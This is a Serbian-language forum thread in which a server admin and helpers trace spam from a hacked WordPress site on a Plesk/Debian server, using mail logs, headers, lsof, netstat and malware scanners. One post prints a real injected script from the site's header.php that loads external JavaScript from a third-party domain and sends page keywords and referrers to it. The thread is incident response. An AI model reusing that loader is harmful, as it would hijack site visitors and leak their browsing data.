[ anon70939 @ 13.04.2016. 21:51 ] @
Imam novu muku :/
Doduse ovo nije produkcioni server. Doduse ima par nekih manje bitnih sajtova koji su hostovani na njemu.

Uglavnom, od Hetznera mi je stigao mail da nam je IP blacklistovana na vise mesta pa i na CBL.

Instalirao sam i skenirao server sa rkhunter i sa chkrootkit ali nista nije pronadjeno.

Kad udarim komandu

tail -f /usr/local/psa/var/log/maillog


Dobijam u sekundi gomile ovakvih redova

Apr 13 22:40:12 africka-sljiva postfix/error[17841]: E3DD726A536B: to=<delores_cole@****.***>, relay=none, delay=25595, delays=25560/36/0/0.17, dsn=4.4.1, status=deferred (delivery temporarily suspended: connect to mail.****.***[176.9.215.29]:25: Connection timed out)
Apr 13 22:40:12 africka-sljiva postfix/error[17903]: E2C18269FC4E: to=<esther_grant@****.***>, relay=none, delay=42378, delays=42342/36/0/0.17, dsn=4.4.1, status=deferred (delivery temporarily suspended: connect to mail.****.***[176.9.215.29]:25: Connection timed out)
Apr 13 22:40:12 africka-sljiva postfix/error[17881]: E1FEA269EB7A: to=<rita_willis@****.***>, relay=none, delay=55689, delays=55654/36/0/0.17, dsn=4.4.1, status=deferred (delivery temporarily suspended: connect to mail.****.***[176.9.215.29]:25: Connection timed out)
Apr 13 22:40:12 africka-sljiva postfix/error[17889]: E0AEB2692C55: to=<jo_gray@****.***>, relay=none, delay=134892, delays=134857/36/0/0.17, dsn=4.4.1, status=deferred (delivery temporarily suspended: connect to mail.****.***[176.9.215.29]:25: Connection timed out)
Apr 13 22:40:12 africka-sljiva postfix/error[18230]: 567F12687A62: to=<[email protected]>, relay=none, delay=296013, delays=295980/33/0/0.17, dsn=4.0.0, status=deferred (delivery temporarily suspended: host mailin-04.mx.aol.com[152.163.0.100] refused to talk to me: 421 mtaig-aal03.mx.aol.com Service unavailable - try again later)
Apr 13 22:40:12 africka-sljiva postfix/pickup[17758]: 282092688C36: uid=10002 from=<luz_ortiz@****.***>
Apr 13 22:40:12 africka-sljiva postfix/cleanup[19392]: warning: connect to Milter service unix:/spamass/spamass.sock: No such file or directory
Apr 13 22:40:12 africka-sljiva postfix/cleanup[19392]: 282092688C36: message-id=<3f8ace6a9a673581ac04da2cf8598c7c@****.***>
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 0E5592681E9C: removed
Apr 13 22:40:12 africka-sljiva opendkim[1053]: 282092688C36: no signing table match for 'luz_ortiz@****.***'
Apr 13 22:40:12 africka-sljiva postfix/cleanup[19384]: 2854C2688C8E: message-id=<20160413204012.2854C2688C8E@**-**.***>
Apr 13 22:40:12 africka-sljiva opendkim[1053]: 282092688C36: no signature data
Apr 13 22:40:12 africka-sljiva postfix/cleanup[19389]: 285432681E9C: message-id=<20160413204012.285432681E9C@**-**.***>
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 999BB26920A8: from=<>, size=11612, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 9E38C2699B31: from=<>, size=3734, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 90FBC2699034: from=<>, size=3612, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 957F12684D79: from=<>, size=10146, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 954C7269A854: from=<>, size=10787, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 99B96268B8CF: from=<>, size=10811, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 90FF5269BAB6: from=<>, size=10900, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 9918D2684AEE: from=<>, size=10779, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 9257A2690BC0: from=<dianne_haynes@****.***>, size=1542, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 9A23D268A34E: from=<>, size=10690, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 90F0D2688F55: from=<>, size=10219, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 90FB026990AD: from=<>, size=10027, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 9B37F2686860: from=<>, size=3859, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 9BA392688662: from=<>, size=11635, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 972B0268C345: from=<>, size=11199, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 9D6FB2690DD9: from=<>, size=11291, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 9DC1726A6B64: from=<>, size=10260, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 9F403268B5CE: from=<>, size=10666, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 926B8268C6AD: from=<>, size=9521, nrcpt=1 (queue active)
Apr 13 22:40:12 africka-sljiva postfix/qmgr[17759]: 9A8E52692887: from=<ellen_wright@****.***>, size=7884, nrcpt=1 (queue active)


Koji su koraci da resim ovo?

Da li moze da bude problematicno to sto sam sa jednog drugog servera gde su nam hakovali neki WP sajt, prebacili ga na ovaj server tako sto smo instalirali clean WP, i iskopirali samo folder sa temom, Ali smo prebacili i bazu koju nismo proveravali da li je infected, posto nisam znao kako to da proverim

Pitam da li postoji mogucnost da je to problem, posto najveci deo ovih adresa na koje pokusava da posalje mail su sa tim domenom tog sajta.
[ Aleksandar Đokić @ 13.04.2016. 22:00 ] @
A da ne salje taj sajt tj. neka skripta koju si prebacio?

Pogledaj u queue-u za neki ID sta konkretno mejl sadrzi pa ces u hederima imati vise informacija. PHP obicno ubacu ono... kako se zove sad... koja skripta salje itd.
[ anon70939 @ 13.04.2016. 22:10 ] @
Sad cu to da vidim.

Nadjoh u medjuvremenu ovo uputstvo, gde se bas pretpostavlja da je neka php skripta i nacin da detektujem koja

https://kb.plesk.com/en/114845

[ Miroslav Strugarevic @ 13.04.2016. 23:19 ] @
Mozda da pokrenes lsof na serveru i da pratis koji se procesi konektuju na port 25 pa da na osnovu PID-a saznas ko salje mail-ove.

watch -n 1 "lsof -nPi tcp:25"

[ Miroslav Strugarevic @ 13.04.2016. 23:31 ] @
Ako ti je websajt "busan" onda mozes da ocekujes da ti se neko infiltrira na server i posle brisanja te email skripte. Zato je najbolje da sve vratis iz bekapa i da OBAVEZNO redovno radis update OS-a. Takodje bi bilo zgodno da uradis update websajta (ako je CMS u pitanju), ili da ti programer proveri sta moze da bude nacin kako ti taj neko ubacuje te gluposti.

Pogledaj i ovo: https://github.com/rfxn/linux-malware-detect
[ Aleksandar Đokić @ 14.04.2016. 02:17 ] @
Plesk je... znaci sajt je pod nekim userom koji nema nikakva prava, pa nije mnogo strasno.

Moze da se nakaci neko jedino reverznim shell-om, procita "passwd" i to bi bilo to - ako ne idemo u sf vode da uradi neki "privilege escalation" pa tako dobije veca prava.

U stvari je, kod takvih situacija najopasnije ako postoje drugi sajtovi pod isti userom, ili postoje fajlovi sa lose podesenim permisijama, onda obicnim nagadjanjem putanje i symlinkom moze da procita i/ili izmeni te fajlove (dok sam radio hosting to mi se desavalo 2 puta nedeljno, naravno kad su dozvole u redu ne mogu nista).
[ maksvel @ 14.04.2016. 08:01 ] @
A čekaj, da nije mail-server open-relay? Da li je to uopšte moguće ako je shared hosting?
[ Aleksandar Đokić @ 14.04.2016. 14:31 ] @
Moguce je, ali u pitanju je Plesk, pa je malo verovatno.
[ Miroslav Strugarevic @ 14.04.2016. 19:23 ] @
Bilo bi lepo da neko posalje i neki link :D (ako nista drugo)

https://wiki.hetzner.de/index.php/Mailserver_Relaytest/en
[ anon70939 @ 14.04.2016. 21:25 ] @
Ne stizem da vam odgovorim, na putu sam :).
Dedicated server, Debian 8.1+ LAMP sa Plesk 2.15
[ anon70939 @ 15.04.2016. 23:13 ] @
Citat:
Miroslav Strugarevic:
Mozda da pokrenes lsof na serveru i da pratis koji se procesi konektuju na port 25 pa da na osnovu PID-a saznas ko salje mail-ove.

watch -n 1 "lsof -nPi tcp:25"

http://static.elitesecurity.org/uploads/3/6/3669158/lsof.png


Nadjoh malo vremena,
okinuh tu komandu i u sekundi mi se pojavilo gomile razultata poput ovog


I kad sam kucao komandu

lsof -p 13002


Dobio sam

COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
smtp 13002 root cwd DIR 9,2 4096 40370312 /var/spool/postfix
smtp 13002 root rtd DIR 9,2 4096 2 /
smtp 13002 root txt REG 9,2 121472 50728758 /usr/lib/postfix/smtp
smtp 13002 root mem REG 9,2 47712 23724184 /lib/x86_64-linux-gnu/libnss_files-2.19.so
smtp 13002 root mem REG 9,2 43592 23724186 /lib/x86_64-linux-gnu/libnss_nis-2.19.so
smtp 13002 root mem REG 9,2 31632 23724182 /lib/x86_64-linux-gnu/libnss_compat-2.19.so
smtp 13002 root mem REG 9,2 14664 23724178 /lib/x86_64-linux-gnu/libdl-2.19.so
smtp 13002 root mem REG 9,2 1738176 23724175 /lib/x86_64-linux-gnu/libc-2.19.so
smtp 13002 root mem REG 9,2 84856 23724189 /lib/x86_64-linux-gnu/libresolv-2.19.so
smtp 13002 root mem REG 9,2 89104 23724181 /lib/x86_64-linux-gnu/libnsl-2.19.so
smtp 13002 root mem REG 9,2 1840496 51386617 /usr/lib/x86_64-linux-gnu/libdb-5.3.so
smtp 13002 root mem REG 9,2 137440 23724089 /lib/x86_64-linux-gnu/libpthread-2.19.so
smtp 13002 root mem REG 9,2 113520 51386508 /usr/lib/x86_64-linux-gnu/libsasl2.so.2.0.25
smtp 13002 root mem REG 9,2 2062720 51386697 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
smtp 13002 root mem REG 9,2 392312 51386684 /usr/lib/x86_64-linux-gnu/libssl.so.1.0.0
smtp 13002 root mem REG 9,2 257536 50610097 /usr/lib/libpostfix-util.so.1.0.1
smtp 13002 root mem REG 9,2 260656 50609840 /usr/lib/libpostfix-global.so.1.0.1
smtp 13002 root mem REG 9,2 22312 50609932 /usr/lib/libpostfix-dns.so.1.0.1
smtp 13002 root mem REG 9,2 100704 50609974 /usr/lib/libpostfix-tls.so.1.0.1
smtp 13002 root mem REG 9,2 38632 50609972 /usr/lib/libpostfix-master.so.1.0.1
smtp 13002 root mem REG 9,2 140928 23724090 /lib/x86_64-linux-gnu/ld-2.19.so
smtp 13002 root 0u CHR 1,3 0t0 1028 /dev/null
smtp 13002 root 1u CHR 1,3 0t0 1028 /dev/null
smtp 13002 root 2u CHR 1,3 0t0 1028 /dev/null
smtp 13002 root 3r FIFO 0,8 0t0 39333405 pipe
smtp 13002 root 4w FIFO 0,8 0t0 39333405 pipe
smtp 13002 root 5u unix 0xffff8800d4851480 0t0 39333403 socket
smtp 13002 root 6u unix 0xffff8800d4851b80 0t0 39333401 private/plesk-213.2**.***.*-
smtp 13002 root 7u unix 0xffff88057fdd38c0 0t0 39332241 socket
smtp 13002 root 8u REG 9,2 0 40370753 /var/spool/postfix/pid/unix.plesk-213.2**.***.*-
smtp 13002 root 10u 0000 0,9 0 7688 anon_inode
smtp 13002 root 11r FIFO 0,8 0t0 39332251 pipe
smtp 13002 root 12w FIFO 0,8 0t0 39332251 pipe
smtp 13002 root 123r FIFO 0,8 0t0 39333406 pipe
smtp 13002 root 124w FIFO 0,8 0t0 39333406 pipe



Je l' to znaci da mi root salje mailove :o
[ anon70939 @ 15.04.2016. 23:43 ] @
Sto se tice open relay,
nadjoh na pleskovom sajtu kako da proverim

https://kb.plesk.com/en/1394


root@africka-sljiva ~ # telnet mail.****.*** 25
Trying 213.***.***.*...
Connected to mail.****.***.
Escape character is '^]'.
220 africka-sljiva.****.*** ESMTP Postfix (Debian/GNU)
mail from: [email protected]
250 2.1.0 Ok
rcpt to: [email protected]
454 4.7.1 <[email protected]>: Relay access denied


izlupa sam neke adrese, valjda je to ok :), i izgleda nije server open relay

I u Plesku mi je podeseno po defaultu da nije Open relay


I u queue mi stoje preko 65000 mailova, najstariji je 3 dana star.... :o
I svuda mi pise da se mailovi salju sa tog sajta kojeg sam pomenuo da sam transferovao na ovaj server. jer u domenu tog maila vidim taj domen.

[Ovu poruku je menjao CoyoteKG dana 16.04.2016. u 00:53 GMT+1]
[ Aleksandar Đokić @ 16.04.2016. 02:43 ] @
Rekoh ti, pogledaj heder tih mejlova.
[ anon70939 @ 17.04.2016. 12:43 ] @
Da... u headeru se poklapa da je user od ovog sajta koji sam transferovao :/

Code:

Received: by africka-sljiva.****.*** (Postfix, from userid 10002)
    id E9F42268377C; Sat,  9 Apr 2016 08:10:55 +0200 (CEST)
To: [email protected]
Subject: Wanna f%ck a pretty babe?
X-PHP-Originating-Script: 10002:xml.php(1948) : eval()'d code
Date: Sat, 9 Apr 2016 08:10:55 +0200
From: Constance Reed <constance_reed@*****.***>
Message-ID: <37547b73f8f42d39631fd08706a777d1@*****.***>
X-Priority: 3
X-Mailer: PHPMailer 5.2.9 (https://github.com/PHPMailer/PHPMailer/)
MIME-Version: 1.0
Content-Type: multipart/alternative;
    boundary="b1_37547b73f8f42d39631fd08706a777d1"
Content-Transfer-Encoding: 8bit


Sta znaci ovo?
X-PHP-Originating-Script: 10002:xml.php(1948) : eval()'d code

To je ta neka xml.php skripta koja salje mailove?
Nasao sam je u root-u tog sajta. Evo okacih u attachment zipovano.

Nije mi samo jasno kako se stvorila tu. Jer kao sto rekoh, instalirao sam nov WP, i iskopirao samo wp-content...
[ maksvel @ 17.04.2016. 16:33 ] @
Ovo mi definitivno liči na neki malver. Kodiran niz naredbi, koje nisu čitljive na prvi pogled, a koje se izvršavaju tako što se dekodiraju u veliki string normalnih naredbi, koje se posle izvrše sa eval.
Verujem da možeš slobodno da obrišeš ovaj fajl ili bar da ga preimenuješ za početak, pa da se vidi sa čim je eventualno još povezan, šta je eksploitovano da bi se on tu našao itd.
Trebalo bi da bar pustiš neki pentest program da vidiš u kakvom ti je stanju sajt, w3af ili ZAP npr.
[ anon70939 @ 23.04.2016. 20:08 ] @
Poginuh na poslu, pa sam mislio da sam odlozio resavanje problema, pukim stopiranjem mail servisa, kako mailovi ne bi isli dalje.
Posto mi na tom serveru za sad i nije potreban mail servis.

Ali opet poceli da mi stizu od hetznera "Abuse" mailovi kako treba to da resim.
Pogledam u servisima u Plesku, oni su opet startovani.

Nesto ih je startovalo. Nadam se da mi nije root user kompromitovan
Kako mogu da vidim koji user je startovao te servise i kad?


U attach je par php fajlova koji imaju modified date noviji od ostlaih.
Pretpostavljam da je sve to malware


Sklonio bih sajt sa servera, i mozda bi to resilo problem (jedino me strah sta je moglo da startuje servise... nadam se da plesk ima nesto automatizovano pa ih podize posle nekog vremena).
Pre nego sto obrisem sajt, moram da nadjem nacin sa w3af i ZAP da vidim kako mi je neko uopste ubacio taj malware...
[ maksvel @ 23.04.2016. 20:36 ] @
Da, ovo su neki... pa ne virusi, ali bekdor skriptovi
Evo analize sa VirusTotal-a.


Je li to neki CMS?

Trebalo bi da u nekom od logova imaš kada je startovan servis.
[ anon70939 @ 23.04.2016. 20:48 ] @
Wordpress sajt je u pitanju.

Sad sam instalirao ovaj Zed, i pustio attack i zavrsio se.
Odoh sad da vidim kako se gledaju ovi rezultati :)
I kako da vidim sta je neko uspeo da iskoristi da ubacio ove bekdorove


edit:


Code:
Description:
X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Other info:
At "High" threshold this scanner will not alert on client or server error responses.
Solution:
Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY.  ALLOW-FROM allows specific websites to frame the web page in supported web browsers).

Reference:
http://blogs.msdn.com/b/ieinte...king-with-x-frame-options.aspx


Code:

Description:
A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible.

Solution:
Ensure that the HttpOnly flag is set for all cookies.

Reference:
www.owasp.org/index.php/HttpOnly

Code:

Description:
Web Browser XSS Protection is not enabled, or is disabled by the configuration of the 'X-XSS-Protection' HTTP response header on the web server

Other info:
The X-XSS-Protection HTTP response header allows the web server to enable or disable the web browser's XSS protection mechanism. The following values would attempt to enable it: 
X-XSS-Protection: 1; mode=block
X-XSS-Protection: 1; report=http://www.example.com/xss
The following values would disable it:
X-XSS-Protection: 0
The X-XSS-Protection HTTP response header is currently supported on Internet Explorer, Chrome and Safari (WebKit).
Note that this alert is only raised if the response body could potentially contain an XSS payload (with a text-based content type, with a non-zero length).

Solution:
Ensure that the web browser's XSS filter is enabled, by setting the X-XSS-Protection HTTP response header to '1'.

Reference:
https://www.owasp.org/index.ph...ipting)_Prevention_Cheat_Sheet
https://blog.veracode.com/2014...-for-setting-security-headers/

Code:

Description:
The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

Other info:
This issue still applies to error type pages (401, 403, 500, etc) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.
At "High" threshold this scanner will not alert on client or server error responses.

Solution:
Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.
If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

Reference:
http://msdn.microsoft.com/en-u.../ie/gg622941%28v=vs.85%29.aspx
https://www.owasp.org/index.php/List_of_useful_HTTP_headers




[Ovu poruku je menjao CoyoteKG dana 23.04.2016. u 22:02 GMT+1]
[ maksvel @ 23.04.2016. 20:52 ] @
Možeš proguglati - ima jako puno tutorijala kako ukloniti malware sa Wordpress-a, jer je on baaš česta meta.
Npr: https://aw-snap.info/articles/spam-hack-wordpress.php

Upravo tvoj slučaj:
Citat:
You are checking for a couple of things, first any obfuscated php code usually base64_decode but occasionally preg_replace.


Probaj sa nekim od ovih security plaginova. Nisam ih koristio lično, ali bi trebalo da pomognu.
[ anon70939 @ 23.04.2016. 21:05 ] @
Wordfence koristim vec na vecini sajtova, i nije mi jasno kako ga nemam ovde.
Bio sam siguran da je instaliran... o.O
Zato sam se i cudio kako nista ne prijavljuje

Sad cu bas probati. on ima opciju za scan

edit:
nasao mi je desetak php skripti...
Doduse nije prepoznao onu xml.php sto sam gore negde okacio, sto mi salje mailove.
Sutra cu da kupim Premium verziju, koja vidim da ima opciju i za to da cekira da li salje nesto mailove...


Nego nevezano za to.
Primetio sam da kad otvaram stranicu, da mi to dugo radi, a dole u dnu pise
"waiting for www.tnmatricsschools.com", i onda tek posle tridesetak sekundi otvori stranicu...

Uradio sam search svih fajlova da vidim gde se pominje taj fajl i naisao u header.php ovo sto je u zip attach.
nalazi se u <head></head> tagovima


Code:
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://www.tnmatricschools.com...in.php?c_utt=I92930&c_utm='+encodeURIComponent('http://www.tnmatricschools.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>



cemu sluzi ova skripta?
guglam, ali ne vidim neko objasnjenje

[Ovu poruku je menjao CoyoteKG dana 23.04.2016. u 23:00 GMT+1]


sad mi pada na pamet, da mozda ta skripta proverava lokaciju odakle neko browsuje pa ga preusmerava na srpski ili nemacki deo sajta, odnosno jezik.
Je l' moze biti to?

[Ovu poruku je menjao CoyoteKG dana 23.04.2016. u 23:15 GMT+1]
[ anon70939 @ 29.04.2016. 12:23 ] @
ovo je vec otislo predaleko...
OK, nije mi produkcioni server, i mozda bih mogao samo ovaj jedan sajt da migriram negde, ali vrlo moguce da cu sa njim prevuci i tu neku skriptu...

To nesto mi startuje mail servise, promenilo mi je permisije na celom /var/ folderu u 777

Od jutros to ispravljam, poredim sa permisijama na nekom drugom folderu.
Promenio sam sve passworde koje znam da imam.
instalirao clamav i pustio ga da sve skenira, ali...

----------- SCAN SUMMARY -----------
Known viruses: 4300836
Engine version: 0.99
Scanned directories: 30830
Scanned files: 528196
Infected files: 0
Data scanned: 7970.26 MB
Data read: 98932.53 MB (ratio 0.08:1)
Time: 2482.512 sec (41 m 22 s)


je l' postoji neki drugi alat sa kojim mogu da skeniram server?


edit:
Instalirao sam ovo
i detektovao mi je onu skriptu koju sam ranije nasao da salje mailove, a nisam hteo da je obrisem dok ne saznam kako je dospela tu...
Pored toga nasao je i neki php fajl u css direktorijumu...

Nadam se da ce to biti to...



edit2:
nasao mi jos nekoliko fajlova, obrisao sam ih...
pokrenuo postfix i

komandu
watch -n 1 "lsof -nPi tcp:25"

i opet se slali mailovi...
Ali se setih da mi je queue pun, obrisao sam sve i opet pokrenuo ovu komandu i deluje mi mirno :)

Every 1.0s: lsof -nPi tcp:25 Fri Apr 29 14:07:38 2016

COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
master 14275 root 12u IPv4 150762281 0t0 TCP *:25 (LISTEN)
master 14275 root 13u IPv6 150762282 0t0 TCP *:25 (LISTEN)
smtpd 14305 postfix 6u IPv4 150762281 0t0 TCP *:25 (LISTEN)
smtpd 14305 postfix 7u IPv6 150762282 0t0 TCP *:25 (LISTEN)


ostalo jos da sredim permisije nekako... i da se nadam da je ovaj antimalware nasao sve skripte :)

[Ovu poruku je menjao CoyoteKG dana 29.04.2016. u 14:13 GMT+1]
[ Aleksandar Đokić @ 29.04.2016. 14:39 ] @
Au pa ne moze da promeni permisije /var-a osim ako nije pod root nalogom startovan. Bice da je onda u problemu ceo server.

Proveri ima li nekih back-connect-a putem npr perl-a sa:

ps -auxf | grep perl

i trazi nesto sumnjivo. Proveri sa netstat -tulpn sta i gde slusa pa vidi ima li nesto sumnjivo. Ispada da su dosli do root-a (nadam se da nisu).

Zato je mnogo bitno da se to izvrsava pod zasebnim userom, koji nema shell itd.
[ anon70939 @ 29.04.2016. 18:38 ] @
nejasno mi je kako je neko mogao da dodje do root-a :/
Doduse jako malo o tome znam... verovatno lako...

je l' deluje tebi ovde nesto neregularno?

root@africka-sljiva ~ # ps -auxf | grep perl
root 29569 0.0 0.0 12664 1716 pts/0 S+ 19:30 0:00 \_ grep perl
root 1870 0.0 0.0 90764 26532 ? Ss Apr06 0:26 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf


root@africka-sljiva ~ # netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:12301 0.0.0.0:* LISTEN 1053/opendkim
tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN 18644/dovecot
tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN 18644/dovecot
tcp 0 0 127.0.0.1:783 0.0.0.0:* LISTEN 1747/.spamassassin
tcp 0 0 0.0.0.0:8880 0.0.0.0:* LISTEN 2250/config
tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN 1870/perl
tcp 0 0 0.0.0.0:465 0.0.0.0:* LISTEN 14275/master
tcp 0 0 xxx.xxx.xxx.x:53 0.0.0.0:* LISTEN 863/named
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 863/named
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 869/sshd
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 14275/master
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN 863/named
tcp 0 0 0.0.0.0:8443 0.0.0.0:* LISTEN 2250/config
tcp 0 0 0.0.0.0:4190 0.0.0.0:* LISTEN 18644/dovecot
tcp 0 0 127.0.0.1:12768 0.0.0.0:* LISTEN 19004/psa-pc-remote
tcp 0 0 0.0.0.0:993 0.0.0.0:* LISTEN 18644/dovecot
tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN 18644/dovecot
tcp6 0 0 :::110 :::* LISTEN 18644/dovecot
tcp6 0 0 :::143 :::* LISTEN 18644/dovecot
tcp6 0 0 ::1:783 :::* LISTEN 1747/.spamassassin
tcp6 0 0 :::80 :::* LISTEN 16862/apache2
tcp6 0 0 :::8880 :::* LISTEN 2250/config
tcp6 0 0 :::465 :::* LISTEN 14275/master
tcp6 0 0 :::21 :::* LISTEN 1071/xinetd
tcp6 0 0 :::53 :::* LISTEN 863/named
tcp6 0 0 :::22 :::* LISTEN 869/sshd
tcp6 0 0 :::25 :::* LISTEN 14275/master
tcp6 0 0 :::443 :::* LISTEN 16862/apache2
tcp6 0 0 :::8443 :::* LISTEN 2250/config
tcp6 0 0 :::4190 :::* LISTEN 18644/dovecot
tcp6 0 0 :::993 :::* LISTEN 18644/dovecot
tcp6 0 0 :::995 :::* LISTEN 18644/dovecot
tcp6 0 0 :::3306 :::* LISTEN 1603/mysqld
tcp6 0 0 :::106 :::* LISTEN 1071/xinetd
udp 0 0 0.0.0.0:10000 0.0.0.0:* 1870/perl
udp 0 0 xxx.xxx.xxx.x:53 0.0.0.0:* 863/named
udp 0 0 127.0.0.1:53 0.0.0.0:* 863/named
udp6 0 0 :::56811 :::* 459/systemd-timesyn
udp6 0 0 :::53 :::* 863/named


xxx.xxx.xxx.x je adresa servera
[ Aleksandar Đokić @ 30.04.2016. 02:59 ] @
Ne bas, osim ovog na 10000? Jel to onaj glupi webmin?

Citat:
i detektovao mi je onu skriptu koju sam ranije nasao da salje mailove, a nisam hteo da je obrisem dok ne saznam kako je dospela tu...


Mislio sam da si to vec resio. Tu skriptu ako nisi obrisao cenim da ona salje mejlove :).

Uradi "chmod 000 /putanja/do/skripte". Tako neces morati da je obrises a nece moci da se izvrsi.
[ anon70939 @ 30.04.2016. 10:29 ] @
obrisao sam sve juce...

Webmin? Nisam instalirao i ne koristim, posto imam ovaj plesk, a on je na :8443
Da mi taj "neko" ne startuje mail servise preko webmina? :)
[ Aleksandar Đokić @ 30.04.2016. 11:21 ] @
Promaklo mi da je udp.

Proveri sa lsof sta koristi 10000. Mozda je nesto sasvim legitimno.
[ maksvel @ 30.04.2016. 13:47 ] @
Ima 10000 i za tcp i za udp u prikazu.
To jeste webminov default port (što "glupi webmin", nećemo da se vređamo ).
A, koliko videh, Webmin koristi i udp i tcp, tako da je to najverovatnije on. I, ako je neki stariji, moguće da je tu slaba tačka.
A ako ga ne koristiš, možeš da ga isključiš.
____

root@africka-sljiva ~ #


Ne brini, ovaj server sigurno ne pada LOL

[ anon70939 @ 30.04.2016. 14:08 ] @
Hehehe, orovalio si zasto ga nazvasmo tako :P